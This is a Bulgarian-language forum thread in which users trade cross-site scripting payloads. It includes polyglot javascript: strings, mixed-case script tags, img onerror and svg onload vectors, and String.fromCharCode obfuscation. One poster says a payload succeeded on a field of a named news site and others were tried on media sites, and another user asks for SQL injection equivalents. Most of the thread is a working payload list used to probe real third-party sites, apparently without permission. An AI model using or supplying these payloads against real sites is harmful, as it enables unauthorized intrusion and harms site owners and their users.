jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%

[stuklen]

Нека се свърже с мен.

 

[rujel]

Това опит за нещо като XSS атака ли е, която е базирана на парсване чрез последователно ползване на команди като preg_replace? Очевидно не се е получила.

 

[stuklen]

Търся човека който прави тези опити по сайтове.. Имаше един потребител, който се занимаваше с това. Да точно такова е.

 

[s1yf0x]

@ReminD

 

[ReminD]

Ето още от екзотичните

jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e

">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm&lpar; 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">

';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

<sCrIpt>alert(1)</ScRipt>

- това - за пример в дневник / икономедия другите никъде не минаваха, но пък мина този елементарен на едно от полетата в id.capital

<script x>
<script x>alert('XSS')<script y>

-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>

#"><img src=/ onerror=alert(2)>

 

[Svetliooo]

Ето още от екзотичните

//няма да цитирам кода, за да не става дълго.
Какво е значението дали ще е <script или <ScrIpT ? След като strip_tag ( и еквивалентните му в другите езици ) ще ги премахне така или иначе ... може би някъде ги премахват с preg_replace и заради това ?

Имаш ли подобни за sql injection ?